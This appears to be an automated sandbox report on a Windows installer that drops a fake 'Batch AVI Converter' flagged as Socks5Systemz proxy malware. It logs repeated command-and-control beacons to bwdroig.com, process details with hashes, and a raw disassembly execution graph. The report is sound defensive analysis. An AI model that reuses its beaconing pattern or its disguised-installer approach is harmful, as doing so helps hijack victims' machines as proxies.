                                                            Date: Wed, 11 Sep 2024 19:06:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            48192.168.2.549748185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:51.678250074 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:52.389520884 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            49192.168.2.549749185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:52.507091045 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:53.198771000 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:53.313535929 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:53.551271915 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            50192.168.2.549750185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:53.679820061 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:54.402709961 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20
                                                            Sep 11, 2024 21:06:54.516405106 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:54.763495922 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            51192.168.2.549751185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:54.883301020 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:55.585000038 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            52192.168.2.549752185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:55.709333897 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:56.428320885 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            53192.168.2.549753185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:56.551981926 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:57.264182091 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            54192.168.2.549754185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:57.381532907 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:58.076077938 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            55192.168.2.549755185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:58.207561970 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:58.906440973 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            56192.168.2.549756185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:59.039778948 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:06:59.848431110 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:06:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            57192.168.2.549757185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:06:59.977205992 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:07:00.991636038 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:07:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            58192.168.2.549758185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:07:01.116132975 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:07:01.839601040 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:07:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            59192.168.2.549759185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:07:01.975826025 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:07:02.669235945 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:07:02 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            60192.168.2.549760185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:07:02.790514946 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:07:03.550364971 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:07:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            61192.168.2.549761185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:07:03.678267002 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:07:04.444044113 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:07:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            62192.168.2.549762185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:07:04.598109961 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:07:05.338042974 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:07:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            63192.168.2.549763185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:07:05.459992886 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:07:06.175821066 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:07:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            64192.168.2.549764185.196.8.214803220C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 11, 2024 21:07:06.304177999 CEST318OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39 HTTP/1.1
                                                            Host: bwdroig.com
                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                            Sep 11, 2024 21:07:07.003262997 CEST220INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 11 Sep 2024 19:07:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/7.4.33
                                                            Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: e67b680813008c20


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:15:05:00
                                                            Start date:11/09/2024
                                                            Path:C:\Users\user\Desktop\file.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0x400000
                                                            File size:3'488'773 bytes
                                                            MD5 hash:984C885DE9FEA28A60A25B278F424F50
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:1
                                                            Start time:15:05:00
                                                            Start date:11/09/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp" /SL5="$10452,3217664,56832,C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0x400000
                                                            File size:706'560 bytes
                                                            MD5 hash:F02C8C4B73C31FD56FD90DC77235363B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:3
                                                            Start time:15:05:01
                                                            Start date:11/09/2024
                                                            Path:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe" -i
                                                            Imagebase:0x400000
                                                            File size:2'644'388 bytes
                                                            MD5 hash:91646D419442B59CE172BCBAE8A2A8C9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3335108759.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:6
                                                            Start time:15:05:45
                                                            Start date:11/09/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                            Imagebase:0x7ff7e52b0000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:21.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:2.4%
                                                              Total number of Nodes:1521
                                                              Total number of Limit Nodes:22
                                                              execution_graph 5451 407548 5452 407554 CloseHandle 5451->5452 5453 40755d 5451->5453 5452->5453 6688 402b48 RaiseException 5893 407749 5894 4076dc WriteFile 5893->5894 5899 407724 5893->5899 5895 4076e8 5894->5895 5896 4076ef 5894->5896 5897 40748c 35 API calls 5895->5897 5898 407700 5896->5898 5900 4073ec 34 API calls 5896->5900 5897->5896 5899->5893 5901 4077e0 5899->5901 5900->5898 5902 4078db InterlockedExchange 5901->5902 5904 407890 5901->5904 5903 4078e7 5902->5903 6689 40294a 6690 402952 6689->6690 6691 403554 4 API calls 6690->6691 6692 402967 6690->6692 6691->6690 6693 403f4a 6694 403f53 6693->6694 6696 403f5c 6693->6696 6697 403f07 6694->6697 6700 403f09 6697->6700 6699 403f3c 6699->6696 6701 403154 4 API calls 6700->6701 6703 403e9c 6700->6703 6706 403f3d 6700->6706 6720 403e9c 6700->6720 6701->6700 6702 403ef2 6705 402674 4 API calls 6702->6705 6703->6699 6703->6702 6709 403ea9 6703->6709 6711 403e8e 6703->6711 6708 403ecf 6705->6708 6706->6696 6708->6696 6709->6708 6710 402674 4 API calls 6709->6710 6710->6708 6712 403e4c 6711->6712 6713 403e67 6712->6713 6714 403e62 6712->6714 6715 403e7b 6712->6715 6718 403e78 6713->6718 6719 402674 4 API calls 6713->6719 6717 403cc8 4 API calls 6714->6717 6716 402674 4 API calls 6715->6716 6716->6718 6717->6713 6718->6702 6718->6709 6719->6718 6721 403ed7 6720->6721 6727 403ea9 6720->6727 6723 403ef2 6721->6723 6724 403e8e 4 API calls 6721->6724 6722 403ecf 6722->6700 6725 402674 4 API calls 6723->6725 6726 403ee6 6724->6726 6725->6722 6726->6723 6726->6727 6727->6722 6728 402674 4 API calls 6727->6728 6728->6722 6247 40ac4f 6248 40abc1 6247->6248 6249 4094d8 9 API calls 6248->6249 6251 40abed 6248->6251 6249->6251 6250 40ac06 6252 40ac1a 6250->6252 6253 40ac0f DestroyWindow 6250->6253 6251->6250 6254 40ac00 RemoveDirectoryA 6251->6254 6255 40ac42 6252->6255 6256 40357c 4 API calls 6252->6256 6253->6252 6254->6250 6257 40ac38 6256->6257 6258 4025ac 4 API calls 6257->6258 6258->6255 6259 403a52 6260 403a5a WriteFile 6259->6260 6262 403a74 6259->6262 6261 403a78 GetLastError 6260->6261 6260->6262 6261->6262 6263 402654 6264 403154 4 API calls 6263->6264 6265 402614 6264->6265 6266 402632 6265->6266 6267 403154 4 API calls 6265->6267 6267->6266 6268 40ac56 6269 40ac5d 6268->6269 6271 40ac88 6268->6271 6278 409448 6269->6278 6273 403198 4 API calls 6271->6273 6272 40ac62 6272->6271 6275 40ac80 MessageBoxA 6272->6275 6274 40acc0 6273->6274 6276 403198 4 API calls 6274->6276 6275->6271 6277 40acc8 6276->6277 6279 409454 GetCurrentProcess OpenProcessToken 6278->6279 6280 4094af ExitWindowsEx 6278->6280 6281 409466 6279->6281 6282 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6279->6282 6280->6281 6281->6272 6282->6280 6282->6281 6737 40995e 6740 409960 6737->6740 6738 40999e CallWindowProcA 6739 409982 6738->6739 6740->6738 6740->6739 6741 409960 6742 409982 6741->6742 6744 40996f 6741->6744 6743 40999e CallWindowProcA 6743->6742 6744->6742 6744->6743 6745 405160 6746 405173 6745->6746 6747 404e58 33 API calls 6746->6747 6748 405187 6747->6748 6283 402e64 6284 402e69 6283->6284 6285 402e7a RtlUnwind 6284->6285 6286 402e5e 6284->6286 6287 402e9d 6285->6287 5905 40766c SetFilePointer 5906 4076a3 5905->5906 5907 407693 GetLastError 5905->5907 